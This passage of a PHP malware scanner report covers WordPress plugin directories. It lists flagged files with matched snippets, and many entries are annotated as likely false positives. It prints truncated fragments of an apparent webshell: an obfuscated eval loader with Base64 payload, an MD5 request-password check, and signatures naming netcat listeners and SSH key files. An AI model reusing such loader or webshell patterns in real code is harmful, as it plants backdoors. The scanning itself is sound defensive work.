eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
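| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d); the matched string below is the Base64 encoding of `gzinflate`, i.e. a decompression function name stored in encoded form. |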
Z3ppbmZsYXRl
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/profile-builder-pro/modules/user-listing/userlisting.php Size: 128.34 kB Created: 2020-03-07 13:50:49 Modified: 2020-07-24 20:02:34 Warns: 1
| Description | Match |
|---|
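Exploit double_var2 Line: 1185 Warning The double-variable technique (a variable variable, `${$name}`) is usually used for the obfuscation of malicious code; it is also a regular PHP language feature, so review line 1185 in context. |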
${$gloabl_filter_ids_name}
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:34 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OwnAssets.php Size: 44.62 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Warns: 1
| Description | Match |
|---|
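Function system Warning Potentially dangerous function `system` [https://www.php.net/system]; in the match below the word "system" is followed by English prose inside what appears to be a translatable string (the `__()` calls that follow use the `wp-asset-clean-up` text domain), not by a call to system(). |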
system (e.g. you are using the website for business purposes, to showcase your products and you are not using it as a blog where people leave comments to your posts).', 'wp-asset-clean-up')."\n\n". __('If you are not sure about whether activating this option is right or not, it is better to leave it as it is (to be loaded by default).', 'wp-asset-clean-up')."\n\n". __('Confirm this action to enable the unloading or cancel to leave it loaded by default.', 'wp-asset-clean-up'); $wpacuObjectData['r...
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/FontsGoogle.php Size: 23.64 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 656 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/classes/OptimiseAssets/MinifyJs.php Size: 10.11 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 137 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/classes/Tools.php Size: 32.60 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Dangers: 1
| Description | Match |
|---|
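Sign 471b95ee Line: 328 Dangerous Malware Signature (hash: 471b95ee); the matched word is the name of the Suhosin PHP hardening extension, which legitimate code may also reference, so review line 328 in context. |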
suhosin
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/pro/classes/OptimiseAssets/OptimizeJsPro.php Size: 8.80 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Dangers: 2
| Description | Match |
|---|
Exploit execution2 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); } public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled())); if (! $isEnabledInSettingsWithListOrAuto) { return false; } if (array_key_exists('wpacu_no_inline_js', $_GET)
| Exploit execution2 Line: 36 Dangerous RCE (Remote Code Execution) allows remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
array_filter($allPatterns); }
/** * @return bool */ public static function isInlineJsEnabled() { $isEnabledInSettingsWithListOrAuto = (Main::instance()->settings['inline_js_files'] && (trim(Main::instance()->settings['inline_js_files_list']) !== '' || self::isAutoInlineEnabled()));
if (! $isEnabledInSettingsWithListOrAuto) { return false; }
// Deactivate it for debugging purposes via query string /?wpacu_no_inline_js if (array_key_e...
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/templates/_admin-page-settings-plugin-areas/_fonts-google/_optimize-area.php Size: 13.93 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 71 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/rawr/t-regx/src/SafeRegex/preg.php Size: 3.43 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Dangers: 1
| Description | Match |
|---|
Sign 696317c4 Line: 27 Dangerous Malware Signature (hash: 696317c4) |
@preg_replace
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-asset-clean-up-pro/vendor/matthiasmullie/minify/src/JS.php Size: 38.32 kB Created: 2021-05-16 21:14:26 Modified: 2021-05-16 21:14:26 Warns: 1
| Description | Match |
|---|
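Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec]; in the match below `exec(` is the tail of a quoted string in a list of method names (`'test('`, `'toSource('`, `'toString('`) that is passed to `preg_quote`, so it looks like pattern data for the minifier, not a call to PHP's exec(). |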
exec(', 'test(', 'toSource(', 'toString(', ); $delimiters = array_fill(0, count($propertiesAndMethods), '/'); $propertiesAndMethods = array_map('preg_quote', $propertiesAndMethods, $delimiters); $after = '(?=\s*([\.,;\)\}&\|+]|\/\/|$|\.('.implode('|', $propertiesAndMethods).')))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $callback); $before = '\)\s*'; $after = '(?=\s*\.('.implode('|', $propertiesAndMethods).'))'; $this->registerPattern('/'.$before.'\K'.$pattern.$after.'/', $c...
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.78 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7576 Dangerous Hacker credits |
Hacked by
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 8.30 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 185.99 kB Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/wp-all-import-pro/actions/wp_ajax_import_failed.php Size: 799.00 B Created: 2020-02-19 15:46:12 Modified: 2020-07-24 20:02:35 Dangers: 1
| Description | Match |
|---|
Exploit extract_global Line: 12 Dangerous Code injection: extracting a global variable array into the local scope allows remote attackers to inject PHP code on the target machine via an HTTP request |
extract($_POST)
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/includes/classes/ajax/class-asp-search.php Size: 5.79 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/includes/classes/core/class-asp-init.php Size: 28.14 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
| Description | Match |
|---|
Sign 7830f7a6 Line: 383 Dangerous Malware Signature (hash: 7830f7a6) |
nc-l
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/includes/classes/etc/class-asp_helpers.php Size: 82.97 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/include/tcpdf_colors.php Size: 14.36 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/includes/externals/pdf-smalot/tecnickcom/tcpdf/tcpdf_barcodes_1d.php Size: 71.69 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Warns: 3
| Description | Match |
|---|
Exploit too_many_chr Line: 1071 Warning Concatenating many `chr` calls is a technique usually used to obfuscate malicious code; the values matched here run in ascending sequence, which is more typical of a character table than of an encoded payload (confirm against the upstream TCPDF file) |
chr(0).chr(1).chr(2).chr(3).chr(4).chr(5).chr(6).chr(7).
| Exploit too_many_chr Line: 1072 Warning Concatenating many `chr` calls is a technique usually used to obfuscate malicious code |
chr(10).chr(11).chr(12).chr(13).chr(14).chr(15).chr(16).chr(17).
| Exploit too_many_chr Line: 1073 Warning Concatenating many `chr` calls is a technique usually used to obfuscate malicious code |
chr(20).chr(21).chr(22).chr(23).chr(24).chr(25).chr(26).chr(27).
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/search.php Size: 21.91 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxonomy_term_select.class.php Size: 25.39 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cf_search_callback.class.php Size: 6.03 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_user_select.class.php Size: 8.51 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_taxterm_search_callback.class.php Size: 5.94 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/settings/class/type.class.php Size: 5.81 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 98 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$val['func']($this->newData)
|
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/settings/class/wd_cpt_select.class.php Size: 7.36 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
|
//var/www/kazan/data/www/intim-kazani.info/wp-content/plugins/ajax-search-pro/backend/settings/class/languageselect.class.php Size: 6.91 kB Created: 2019-11-21 21:41:47 Modified: 2020-07-24 20:02:35 Dangers: 1
| Description | Match |
|---|
Function str_rot13 eval_str_rot13 Line: 177 Dangerous Encoded Function `eval` [https://www.php.net/eval] |
riny
|
|
//var/www/kazan/data/www/intim-kazani.info/script_smartwall/update.php Size: 9.06 kB Created: 2020-09-27 12:53:18 Modified: 2020-09-27 13:01:19 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 9 Warning File protected by an MD5 password check on a request parameter, a pattern typically used in web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 9 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/kazan/data/www/intim-kazani.info/script_smartwall/index.php Size: 38.45 kB Created: 2020-09-27 12:53:19 Modified: 2020-09-27 13:01:19 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit password_protection_md5 Line: 19 Warning File protected by an MD5 password check on a request parameter, a pattern typically used in web shells |
md5($_REQUEST["password"])=="4416e04b9d6b6cfa37fe07a21359c030"
| Sign 8f25a7cb Line: 19 Dangerous Malware Signature (hash: 8f25a7cb) |
if(md5($_REQUEST[
|
|
//var/www/kazan/data/www/intim-kazani.info/script_smartwall/smartwall.php Size: 8.87 kB Created: 2020-09-27 12:53:19 Modified: 2020-09-27 13:01:18 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 2 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code |
'bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxUAq2mWzWmlIBhaIFjWGnCWJQlSOEgDQJaBIIBYJdiDPGhLRCa83gK...
| Function eval Line: 2 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("return $r;");} eval('?>'.ETOHERlTjcnxEbfSJHvr('bZrXCsVacqZfpWkaTjcCKyfax43CVs5pS7oZlHPOMn537xn7cq6EAlKtWlV/fT/o3/811/NfymPM9mYa/5JHfRUU7uQ4Vpa+DrOW7Pv3v803/86BVlzuP/7zb+ufabIVBPZ/8iKb8uLvf43ReU6HeItCp1dFpc4QHzEEuou/xhmL/qRILOZI8xV0d5/D+qzaf/7513/8cy32Yx3/UpxJ//e//u/J39Z//u781/9c/ONf//HHv/1/A/ojjdeQ27wt94Pydlo+fUy52Iy7lZZzQjHPWVFUOrVjiD0t1DGdV4AuA+OCA90TxN8V8MFe/8akjsFg15Lpw/TAxgcvLS8uzJQkkBegpMDbuqPaY6EleOgn8YIuCUc2ooGj46X9HYDgqPLvyJCK0OXHCvXL6H6AaJqhHvOGwW+BWV9ZoJYuHDtN8lMQ8Ybi9wsCoFaAKxU...
| Sign 11413268 Line: 2 Dangerous Malware Signature (hash: 11413268) |
eval('?>
| Sign 7f5d33bf Line: 2 Dangerous Malware Signature (hash: 7f5d33bf) |
Jhc2U2N
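| Sign d97f004d Line: 2 Dangerous Malware Signature (hash: d97f004d); the matched string below is the Base64 encoding of `gzinflate`, i.e. a decompression function name stored in encoded form. |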
Z3ppbmZsYXRl
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wordpress-seo-premium/premium/classes/redirect/redirect-validator.php Size: 4.64 kB Created: 2021-11-12 13:56:02 Modified: 2022-06-22 21:33:22 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 140 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$validation_rule['validation_class']()
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Helper/HTML.php Size: 24.21 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 1
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Reader/Excel5.php Size: 285.98 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 7580 Dangerous Hacker credits |
Hacked by
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/File.php Size: 5.87 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 1
| Description | Match |
|---|
Sign 471b95ee Line: 176 Dangerous Malware Signature (hash: 471b95ee) |
Suhosin
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/PCLZip/pclzip.lib.php Size: 209.23 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2454 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2588 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3386 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3575 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5162 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/classes/PHPExcel/Shared/OLERead.php Size: 10.98 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 308 Dangerous Hacker credits |
Hacked by
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/helpers/functions.php Size: 12.02 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval ("return ($str);")) ? $then : $else; } } if ( ! function_exists('is_empty') ) { function is_empty( $var ) { return empty($var); } } if ( ! function_exists('pmxi_human_filesize') ) { function pmxi_human_filesize($bytes, $decimals = 2) { $sz = 'BKMGTP'; $factor = (int) floor((strlen($bytes) - 1) / 3); return sprintf("%.{$decimals}f", $bytes / pow(1024, $factor)) . (isset($sz[$factor]) ? $sz[$factor] : ''); } } if ( ! function_exists('pmxi_get_remote_image_ext') ) { function pmxi_get_remote_im...
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/pclzip.lib.php Size: 186.03 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 5
| Description | Match |
|---|
Exploit nano Line: 2458 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_ADD](PCLZIP_CB_PRE_ADD, $v_local_header)
| Exploit nano Line: 2592 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_ADD](PCLZIP_CB_POST_ADD, $v_local_header)
| Exploit nano Line: 3390 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_PRE_EXTRACT](PCLZIP_CB_PRE_EXTRACT, $v_local_header)
| Exploit nano Line: 3579 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$p_options[PCLZIP_CB_POST_EXTRACT](PCLZIP_CB_POST_EXTRACT, $v_local_header)
| Sign 963e968a Line: 5166 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/phpseclib/Net/SFTP/Stream.php Size: 21.28 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 182 Warning Double var technique is usually used for the obfuscation of malicious code |
${$host}
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/phpseclib/Net/SSH2.php Size: 167.84 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Warns: 2 Dangers: 1
| Description | Match |
|---|
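Exploit base64_long Warning Long Base64-encoded text is usually used for the obfuscation of malicious code; the match below consists only of hexadecimal digits and begins like the published Diffie-Hellman group primes used in SSH key exchange, so it is probably a cryptographic constant of this SSH library rather than an encoded payload (confirm against the upstream phpseclib source). |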
'FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFF...
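| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec]; the match below, `exec($command, $callback = null) {`, has the shape of a method declaration (a parameter list with a default value, followed by a body), not a call to PHP's built-in exec(). |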
exec($command, $callback = null) { $this->curTimeout = $this->timeout; $this->is_timeout = false; $this->stdErrorLog = ''; if (!$this->isAuthenticated()) { return false; } if ($this->in_request_pty_exec) { user_error('If you want to run multiple exec()\'s you will need to disable (and re-enable if appropriate) a PTY for each one.'); return false; } $this->window_size_server_to_client[self::CHANNEL_EXEC] = $this->window_size; $packet_size = 0x4000; $packet = pack( 'CNa*N3', NET_SSH2_MSG_CHANNEL_O...
| Sign 91535293 Line: 19 Dangerous Malware Signature (hash: 91535293) |
ls -la
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/phpseclib/Net/SSH1.php Size: 51.43 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Warns: 1 Dangers: 2
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($cmd, $block = true) { if (!($this->bitmap & self::MASK_LOGIN)) { user_error('Operation disallowed prior to login()'); return false; } $data = pack('CNa*', NET_SSH1_CMSG_EXEC_CMD, strlen($cmd), $cmd); if (!$this->_send_binary_packet($data)) { user_error('Error sending SSH_CMSG_EXEC_CMD'); return false; } if (!$block) { return true; } $output = ''; $response = $this->_get_binary_packet(); if ($response !== false) { do { $output.= substr($response[self::RESPONSE_DATA], 4); $response = $this->...
| Sign 11413268 Line: 1084 Dangerous Malware Signature (hash: 11413268) |
exploit
| Sign 91535293 Line: 18 Dangerous Malware Signature (hash: 91535293) |
ls -la
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/phpseclib/System/SSH/Agent.php Size: 10.00 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 1
| Description | Match |
|---|
Sign 91535293 Line: 21 Dangerous Malware Signature (hash: 91535293) |
ls -la
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/phpseclib/Crypt/RSA.php Size: 109.46 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Dangers: 1
| Description | Match |
|---|
Sign 19ee5b66 Line: 230 Dangerous Malware Signature (hash: 19ee5b66) |
.ssh/authorized_keys
|
|
//var/www/www-root/data/www/android-apk.fun/wp-content/plugins/wp-all-import-pro/libraries/phpseclib/Crypt/Base.php Size: 100.43 kB Created: 2021-08-07 22:24:53 Modified: 2022-06-22 21:33:22 Warns: 1 Dangers: 1
| Description | Match |
|---|
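Exploit php_uname Line: 2674 Dangerous RCE (Remote Code Execution) allows remote attackers to execute arbitrary commands or code on the target machine. The match below, `php_uname('m')`, only returns the machine type string and executes nothing by itself, so confirm the surrounding code before treating this as RCE |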
php_uname('m')
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
